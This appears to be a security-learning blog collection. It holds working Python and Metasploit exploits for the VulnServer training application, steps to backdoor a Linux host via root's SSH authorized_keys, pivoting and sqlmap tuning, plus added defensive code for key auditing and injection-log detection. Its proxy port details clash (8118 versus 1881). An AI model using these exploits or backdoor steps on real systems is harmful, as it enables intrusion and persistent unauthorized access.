Porting VulnServer "GMON /" SEH exploit to Metasploit

Pre-requisites: http://resources.infosecinstitute.com/seh-exploit/
Corelan template: http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

Refresher on the SEH exploit

Now onto the python code 🙂

[cc lang="python"]
import struct
import socket

shellcode = b"\xCC\xCC\xCC"  # use your own shellcode; bad chars \x00\x0A\x0D
sehp = b"\xEB\x0F\x90\x90"  # JMP 0F (15 bytes forward), NOP, NOP (pointer to next SEH record)
seho = struct.pack("<L", 0x625010b4)  # SEH handler overwrite, little-endian; same address as the module's target Ret
longjump = b"\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF"  # pop ecx; dec ch x3; jmp ecx / call -14: jump back 768 bytes
buffer = b"\x90" * 2752 + b"\x90" * 32 + shellcode + b"\x90" * (714 - len(shellcode)) + sehp + seho + longjump + b"D" * 480
# make_nops: 2752 + 32 = 2784
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
data = s.recv(1024)  # banner
s.send(b"GMON /" + buffer)
s.close()
[/cc]

This becomes the Metasploit exploit:

[cc lang="ruby"]
# Metasploit template from corelan.be
# SEH for vulnserver thegreycorner.com
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote # A remote exploit

  include Msf::Exploit::Remote::Tcp # using TCP connection

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Vulnserver SEH exploit',
      'Description' => %q{
        This module exploits an SEH overwrite in
        vulnserver.
      },
      'Author' => [ 'Stephen Bradshaw', 'Duncan Winfrey' ],
      'Version' => '$Revision: 9999 $',
      'References' =>
        [
          [ 'Vulnserver', 'http://www.thegreycorner.com/p/vulnserver.html' ],
          [ 'corelan.be', 'http://tinyurl.com/64s3je4' ],
        ],

      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          'Space' => 500,
          'BadChars' => "\x00\x0a\x0d",
        },
      'Platform' => 'win',

      'Targets' =>
        [
          ['Windows NT/2000/XP/2003',
            { 'Ret' => 0x625010b4 } ],
        ],
      'DefaultTarget' => 0,

      'Privileged' => false
    ))

    register_options(
      [
        Opt::RPORT(9999)
      ], self.class)
  end

  def exploit
    connect

    request = 'GMON /'
    request << rand_text_alpha_upper(2752)
    request << make_nops(32)
    request << payload.encoded
    request << rand_text_alpha_upper(714 - payload.encoded.length)
    request << "\xEB\x0F\x90\x90" # short jump forward (next SEH pointer)
    request << [target.ret].pack('V') # SEH handler overwrite
    request << "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # pop ecx; dec ch x3; jmp ecx: go back 768 bytes
    request << rand_text_alpha_upper(480) # junk

    sock.put(request)

    handler
    disconnect

  end

end
[/cc]

The working module 🙂

Porting VulnServer TRUN /.:/ exploit to Metasploit

Pre-requisites: http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

BoF template used: https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

I followed the bof tutorial using python 🙂

The Python version of the exploit looks like this:

[cc lang="python"]
import socket

ret = b"\xAF\x11\x50\x62"  # 0x625011AF JMP ESP in essfunc.dll, little-endian
nop = b"\x90" * 32
shellcode = b"\xCC\xCC\xCC"  # use your own shellcode; bad chars \x00\x0A\x0D
buffer = b"A" * 2003 + ret + nop + shellcode + b"D" * 636
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 9999))
s.recv(1024)  # banner
s.send(b"TRUN /.:/" + buffer)
s.close()
[/cc]

To port to Metasploit you need to think about the type of exploit it is: a remote Windows exploit.
[cc lang="ruby"]class Metasploit3 < Msf::Exploit::Remote[/cc]
This means you will need a TCP connection.
[cc lang="ruby"]include Msf::Exploit::Remote::Tcp[/cc]
The default port number for vulnserver is 9999.
[cc lang="ruby"]Opt::RPORT(9999)[/cc]
Then you will need to think about the elements of the buffer in the sploit 🙂
The starting "TRUN /.:/" command, then the junk space; in Metasploit, NOPs from make_nops() are used instead of "A" * 2003.
Next we need to know the return address that will end up in EIP. This will be 0x625011AF from essfunc.dll, which is universal because it comes from the vulnserver program's own DLL.
[cc lang="ruby"]
'Targets' =>
  [
    ['Windows XP Universal',
      { 'Ret' => 0x625011af, 'Offset' => 2003 } ],
  ],
[/cc]
In the 'Payload' section we add the amount of space allowed for shellcode and the bad chars:
[cc lang="ruby"]
'Payload' =>
  {
    'Space' => 900,
    'BadChars' => "\x00\x0A\x0D",
  },
[/cc]
Then we need to add a NOP sled, because the shellcode will need space in memory to decode. payload.encoded handles all the payload encoding and decoding in memory, so no decoding NOPs are strictly needed; they are added just in case.
Then the amount of space for shellcode: in this case it's around 900, which is loads of space for shellcode.
This makes the final sploit:
[cc lang="ruby"]
sploit = 'TRUN /.:/' + junk + [target.ret].pack('V') + make_nops(32) + payload.encoded
[/cc]
This makes the Metasploit module:

[cc lang="ruby"]
# Metasploit template from corelan.be
# BoF for vulnserver thegreycorner.com
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote # A remote exploit

  include Msf::Exploit::Remote::Tcp # using TCP connection

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Vulnserver stack overflow',
      'Description' => %q{
        This module exploits a stack overflow in
        vulnserver.
      },
      'Author' => [ 'Stephen Bradshaw', 'Duncan Winfrey' ],
      'Version' => '$Revision: 9999 $',
      'References' =>
        [
          [ 'Vulnserver', 'http://www.thegreycorner.com/p/vulnserver.html' ],
          [ 'corelan.be', 'http://tinyurl.com/64s3je4' ],
        ],

      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload' =>
        {
          'Space' => 500,
          'BadChars' => "\x00\x0A\x0D",
        },
      'Platform' => 'win',

      'Targets' =>
        [
          ['Windows XP Universal',
            { 'Ret' => 0x625011af, 'Offset' => 2003 } ],
        ],
      'DefaultTarget' => 0,

      'Privileged' => false
    ))

    register_options(
      [
        Opt::RPORT(9999)
      ], self.class)
  end

  def exploit
    connect

    junk = make_nops(target['Offset'])
    sploit = 'TRUN /.:/' + junk + [target.ret].pack('V') + make_nops(32) + payload.encoded
    sock.put(sploit)

    handler
    disconnect

  end

end
[/cc]

Then put the code into /opt/metasploit/msf3/modules/exploits/windows/misc as vun_server_bof.rb

Then tested it out 😀

Backdoor Linux using SSH keys

In the Pentesting with BackTrack labs, on viewing the /etc/passwd it's sometimes full of other students' usernames, which is not very stealthy and is very noticeable; it also opens up additional vulnerabilities if it were a real pentest.

It is far easier to add your own SSH key to /root/.ssh/authorized_keys.

First create your ssh key with the command below and hit enter a few times:

$ ssh-keygen

This will create a few files in /root/.ssh/ including id_rsa.pub

Once created, copy the contents of your id_rsa.pub to the end of the authorized_keys file on the compromised host.

This is usually in /root/.ssh/authorized_keys

Then you can just ssh -p 22 root@IP and you will be logged in as root.
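The defender's counterpart to the above is knowing exactly which keys sit in every authorized_keys file. The following is an added example, not from the original post, that parses authorized_keys entries, derives each key's SHA256 fingerprint in the form ssh-keygen -l prints, and reports any entry that is malformed or whose fingerprint is not on an allowlist. The sample file, the key blobs and the allowlist are constructed here; the blobs have the OpenSSH wire layout but are not real keys.

```python
import base64
import hashlib
import re
import struct

# Key types this parser recognises (a subset of what OpenSSH accepts)
KEY_RE = re.compile(
    r"(?:^|\s)(ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521))"
    r"\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$"
)

def fingerprint(blob):
    """SHA256 fingerprint of a raw key blob, formatted the way ssh-keygen -l prints it."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_authorized_keys(text):
    """Yield one dict per entry; blank lines and comments are skipped."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if not m:
            yield {"line": lineno, "error": "unparseable entry", "text": line}
            continue
        ktype, b64, comment = m.group(1), m.group(2), m.group(3) or ""
        try:
            blob = base64.b64decode(b64, validate=True)
        except ValueError:  # binascii.Error is a ValueError
            yield {"line": lineno, "error": "bad base64", "text": line}
            continue
        # The wire format starts with a length-prefixed copy of the key type;
        # a mismatch means the entry was hand-edited or corrupted
        tlen = struct.unpack(">I", blob[:4])[0] if len(blob) >= 4 else -1
        yield {
            "line": lineno,
            "options": line[:m.start()].strip(),  # e.g. from="..." or command="..."
            "type": ktype,
            "fingerprint": fingerprint(blob),
            "comment": comment,
            "consistent": blob[4:4 + tlen] == ktype.encode(),
        }

def audit(text, allowlist):
    """Return entries that are malformed or whose fingerprint is not in the allowlist."""
    findings = []
    for entry in parse_authorized_keys(text):
        if "error" in entry:
            findings.append(entry)
            continue
        reasons = []
        if entry["fingerprint"] not in allowlist:
            reasons.append("unknown key")
        if not entry["consistent"]:
            reasons.append("blob does not match key type")
        if reasons:
            findings.append(dict(entry, reasons=reasons))
    return findings

def make_blob(ktype, payload):
    """Constructed key blob in OpenSSH wire format (length-prefixed strings); not a usable key."""
    return (struct.pack(">I", len(ktype)) + ktype.encode()
            + struct.pack(">I", len(payload)) + payload)

# Constructed sample file: one key the admin knows about, one that appeared out of nowhere
KNOWN = make_blob("ssh-ed25519", b"\x01" * 32)
ROGUE = make_blob("ssh-ed25519", b"\x02" * 32)
SAMPLE = "\n".join([
    "# constructed authorized_keys",
    "ssh-ed25519 " + base64.b64encode(KNOWN).decode() + " admin@workstation",
    "ssh-ed25519 " + base64.b64encode(ROGUE).decode() + " student",
    "not a key at all",
])
ALLOWLIST = {fingerprint(KNOWN)}

if __name__ == "__main__":
    for finding in audit(SAMPLE, ALLOWLIST):
        print(finding)
```

Run against the real file with `audit(open("/root/.ssh/authorized_keys").read(), allowlist)`, where the allowlist holds fingerprints taken from `ssh-keygen -lf` on keys you issued; anything with a "student"-style comment you did not add is the finding that matters.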

 

Simple port killing bash script

Sometimes a port is left listening by a process that was not properly killed. This simple bash script kills the process holding that port.
[cc lang="bash"]
#!/bin/bash
# Usage: ./killport.sh <port>
killport=$1
# Take the PID from the "PID/Program name" column of the line whose local address ends in ":<port>"
process=$(netstat -tulpn 2>/dev/null | awk -v port=":$killport" '$4 ~ (port "$") { split($NF, a, "/"); if (a[1] ~ /^[0-9]+$/) print a[1] }' | head -n 1)
[ -n "$process" ] || { echo "nothing listening on port $killport (or not visible without root)" >&2; exit 1; }
kill -9 "$process"
[/cc]

Using HTTP proxy tools over SSH tunnels

When pivoting through a Linux box I wanted to use DirBuster through the SSH tunnel.

Unfortunately DirBuster does not support SOCKS5 proxies, so I decided to use a tool called Polipo.

Polipo lets you set a parent SOCKS5 proxy and then exposes a local HTTP proxy on a port you specify.

I used the default config file from Tor: Config file
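For reference, these are the Polipo directives that produce the setup described above. This is a constructed config added here, not the Tor file the post links: it points Polipo at the SOCKS5 port that ssh -D opens and serves HTTP on 8118, using the addresses and ports already on this page.

```conf
# Constructed polipo config (not the Tor project's file)
# Parent proxy: the dynamic SOCKS port opened by "ssh -D 127.0.0.1:9050 ..."
socksParentProxy = "127.0.0.1:9050"
socksProxyType = socks5
# Local HTTP proxy that tools without SOCKS support (DirBuster) talk to
proxyAddress = "127.0.0.1"
proxyPort = 8118
```

Binding proxyAddress to 127.0.0.1 matters: if Polipo listened on all interfaces, anyone who could reach the machine would get a free hop through your SSH session.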

To get it working:

$ polipo -c torconfig

Established listening socket on port 8118.

Then connect to the pivot machine using

$ ssh -p 22 -D 127.0.0.1:9050 rootuser@192.168.1.31

Leave both console windows open, then configure the tool you want to use to proxy through localhost:1881.

C++ Star catcher game

This is a game I made for my C++ OOP module

The aim of the game is to keep the score above zero.

Score starts at 10. Every star you miss you lose 2 points and every star you catch you gain 2.

Download Source : Star_Game

How Unique Is Your Browser?

A web browser does not simply download and render HTML anymore. Browsers have many additional features that can be detected, such as which version of Flash you're running, Java, and all the add-ons you have installed, which together can act as a very good fingerprint that can be used to track people.

From the data collected, 1 in 286,777 browsers are unique, so from a legal point of view it would not stand up in court.
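To make the "how unique" figure concrete, here is an added example (not from the post or from the EFF paper) that hashes a handful of browser attributes into a fingerprint and measures how much identifying information it carries over a constructed population of eight browsers: the surprisal in bits of one browser's fingerprint, the Shannon entropy of each attribute, and the conversion of a "1 in N" figure to bits (by that formula the page's 1 in 286,777 comes to about 18.1 bits). Every attribute value below is made up.

```python
import hashlib
import math
from collections import Counter

# Attributes a fingerprinting script would read in the browser (navigator.userAgent,
# navigator.plugins, timezone offset, screen size). Constructed values, not measurements.
KEYS = ("ua", "plugins", "tz", "screen")
POPULATION = [
    {"ua": "A", "plugins": "Flash 10;Java 6", "tz": "0",  "screen": "1280x800"},
    {"ua": "A", "plugins": "Flash 10;Java 6", "tz": "0",  "screen": "1280x800"},  # same as above
    {"ua": "A", "plugins": "Flash 10",        "tz": "0",  "screen": "1280x800"},
    {"ua": "B", "plugins": "Flash 10;Java 6", "tz": "0",  "screen": "1024x768"},
    {"ua": "B", "plugins": "Java 6",          "tz": "-5", "screen": "1280x800"},
    {"ua": "C", "plugins": "Flash 10;Java 6", "tz": "-5", "screen": "1024x768"},
    {"ua": "C", "plugins": "none",            "tz": "-5", "screen": "1280x800"},
    {"ua": "A", "plugins": "Flash 9",         "tz": "-5", "screen": "1920x1080"},
]

def fingerprint(attrs):
    """Hash the attribute values in a fixed order; the digest is the browser's fingerprint."""
    material = "|".join(attrs[k] for k in KEYS)
    return hashlib.sha256(material.encode()).hexdigest()

def surprisal_bits(population, attrs):
    """Information revealed by one fingerprint: -log2(fraction of the population sharing it)."""
    fps = [fingerprint(p) for p in population]
    share = fps.count(fingerprint(attrs)) / len(fps)
    return -math.log2(share)

def attribute_entropy(population, key):
    """Shannon entropy (bits) of a single attribute across the population."""
    n = len(population)
    counts = Counter(p[key] for p in population)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def uniqueness_report(population):
    """How many browsers are identified by a fingerprint nobody else in the population has."""
    fps = [fingerprint(p) for p in population]
    unique = sum(1 for f in fps if fps.count(f) == 1)
    return {"total": len(fps), "unique": unique, "bits_for_unique": math.log2(len(fps))}

def odds_to_bits(one_in):
    """Convert a '1 in N browsers share this fingerprint' figure to bits of identifying information."""
    return math.log2(one_in)

if __name__ == "__main__":
    print(uniqueness_report(POPULATION))
    for key in KEYS:
        print(key, round(attribute_entropy(POPULATION, key), 2), "bits")
    print("1 in 286,777 ->", round(odds_to_bits(286777), 1), "bits")
```

The per-attribute entropies are what the EFF paper tabulates: a plugin list that differs on almost every machine contributes many bits, a timezone shared by half the population contributes one. The two identical browsers show the defence as well: the more of your attributes match a common configuration, the lower your surprisal.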

You can test your browser's uniqueness below:

https://panopticlick.eff.org/index.php

The Electronic Frontier Foundation has an excellent paper on browser uniqueness:

https://panopticlick.eff.org/browser-uniqueness.pdf

Configuring sqlmap

Sqlmap is a great open-source SQL injection tool that I use to aid my learning, using its -v switch, which sets the output verbosity so you can see and learn the SQL payloads sqlmap is sending. I usually set it to -v3.

By default sqlmap tests for blind SQL injection first, which is more often successful but is very slow at extracting data and hard to follow.

The full default order is blind, error, union, stacked, time: "BEUST".

I prefer union, error, stacked, blind, time: "UESBT".

To change the default in sqlmap, open up sqlmap.conf.

On line 236, change tech = BEUST to tech = UESBT.

By default sqlmap does not try all the different types of SQL injection, as some are too noisy/risky.

This can mean that exploitable injections are missed. To avoid this, sqlmap can be configured to test for all types of injection by changing the level and risk settings.

On line 195 you can change level = 1 to level = 5.

On line 202 you can change risk = 1 to risk = 3.

By default sqlmap will only test for 10 columns when using UNION SQL injection, which is too low in most cases. I change the default to 50.

You can change this on line 246: uCols = 50.
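Seen from the server side, the union-column probing described above (a run of UNION ALL SELECT NULL,NULL,... requests growing one column at a time, plus ORDER BY n sweeps) leaves a clear trail in the access log. The following is an added example, not from the original post or from sqlmap itself, that summarises such probes per client over a few constructed Apache-style log lines; the IPs, paths, timestamps and the alert threshold are all made up.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined-log-format prefix: client IP and the request target
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Column-count probing: UNION [ALL] SELECT NULL,NULL,...  and  ORDER BY <n>
UNION_RE = re.compile(r"UNION\s+(?:ALL\s+)?SELECT\s+((?:NULL\s*,\s*)*NULL)", re.I)
ORDER_RE = re.compile(r"ORDER\s+BY\s+(\d+)", re.I)

def probe_summary(log_lines):
    """Per client: number of union probes, widest NULL column count, highest ORDER BY index."""
    stats = defaultdict(lambda: {"union_probes": 0, "max_cols": 0, "order_by_max": 0})
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand
        ip, target = m.groups()
        # Decode the query string so %20 / %2C become the spaces and commas the regexes expect
        query = unquote_plus(target.split("?", 1)[1]) if "?" in target else ""
        s = stats[ip]
        for u in UNION_RE.finditer(query):
            s["union_probes"] += 1
            s["max_cols"] = max(s["max_cols"], u.group(1).upper().count("NULL"))
        for o in ORDER_RE.finditer(query):
            s["order_by_max"] = max(s["order_by_max"], int(o.group(1)))
    return dict(stats)

def suspicious_clients(log_lines, min_probes=3):
    """Clients that sent at least `min_probes` union-column probes (threshold is a chosen value)."""
    return sorted(ip for ip, s in probe_summary(log_lines).items()
                  if s["union_probes"] >= min_probes)

# Constructed access log: one normal visitor and one client walking the column count up
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Mar/2012:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [12/Mar/2012:10:00:02 +0000] "GET /item.php?id=1%20ORDER%20BY%2010--%20- HTTP/1.1" 500 88',
    '10.0.0.9 - - [12/Mar/2012:10:00:03 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%20NULL--%20- HTTP/1.1" 500 88',
    '10.0.0.9 - - [12/Mar/2012:10:00:04 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 500 88',
    '10.0.0.9 - - [12/Mar/2012:10:00:05 +0000] "GET /item.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20- HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for ip, s in probe_summary(SAMPLE_LOG).items():
        print(ip, s)
    print("suspicious:", suspicious_clients(SAMPLE_LOG))
```

Raising uCols to 50 means a scan against a wide table produces up to 50 such requests per parameter, which is exactly why a per-client counter like this is a cheap and reliable signal; a single request matching the pattern is far less conclusive than the monotonically growing sequence.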

There are loads of other options you can change in sqlmap; these are just a few 🙂

Running foremost on windows

Foremost is a Linux forensics tool but can be run under Windows using Cygwin.

First install Cygwin, to the default location.

Then download a Cygwin-compiled version of foremost from a mirror here

Extract foremost.exe and its config file to C:\cygwin\home\<your PC username>

Then go to C:\cygwin and run Cygwin.bat

Then you can run foremost via the Cygwin CLI:

./foremost.exe -t all -i somecase.dd -T

😀

Sources used  : http://www.dcheeseman.com/blog/post/foremost-windows
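Foremost works by scanning the image for known file headers and footers and carving out the bytes between them. The following added example (not from the post or from Foremost) does the same for two signatures over a constructed byte string that stands in for somecase.dd; the signatures, filler, offsets and output naming are chosen here, and a PNG header with no footer shows the case where carving has to stop at a size limit and mark the file incomplete.

```python
from pathlib import Path

# Header/footer signatures in the spirit of foremost's config (constructed subset)
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n", b"IEND\xaeB`\x82"),
    "jpg": (b"\xff\xd8\xff", b"\xff\xd9"),
}

def carve(data, signatures=SIGNATURES, max_len=10 * 1024 * 1024):
    """Return (type, start, end, complete) for every header found in `data`.

    `end` is one past the footer. When no footer follows, the file is cut at
    `max_len` bytes (or at the end of the image) and marked incomplete."""
    found = []
    for name, (header, footer) in signatures.items():
        pos = 0
        while True:
            start = data.find(header, pos)
            if start < 0:
                break
            end = data.find(footer, start + len(header))
            if end < 0:
                found.append((name, start, min(len(data), start + max_len), False))
                pos = start + len(header)
            else:
                end += len(footer)
                found.append((name, start, end, True))
                pos = end
    return sorted(found, key=lambda f: f[1])

def write_carved(data, outdir):
    """Write each carved file as <offset>.<type>, similar to how foremost names its output."""
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    names = []
    for kind, start, end, _complete in carve(data):
        path = out / f"{start:08d}.{kind}"
        path.write_bytes(data[start:end])
        names.append(path.name)
    return names

# Constructed stand-in for somecase.dd: filler, a fake PNG, a fake JPEG, then a PNG with no footer
FILLER = b"\x00" * 64
IMAGE = (FILLER
         + SIGNATURES["png"][0] + b"fake png body" + SIGNATURES["png"][1]
         + FILLER
         + SIGNATURES["jpg"][0] + b"fake jpeg body" + SIGNATURES["jpg"][1]
         + FILLER
         + SIGNATURES["png"][0] + b"cut off")

if __name__ == "__main__":
    for hit in carve(IMAGE):
        print(hit)
```

For a real image, read it with `Path("somecase.dd").read_bytes()` (or memory-map it for anything large) and call `write_carved`. The incomplete-file case is the one to watch in practice: a header with no footer is common for fragmented or overwritten files, and the cut-off length decides whether you get a usable partial file or a 10 MB blob of unrelated sectors.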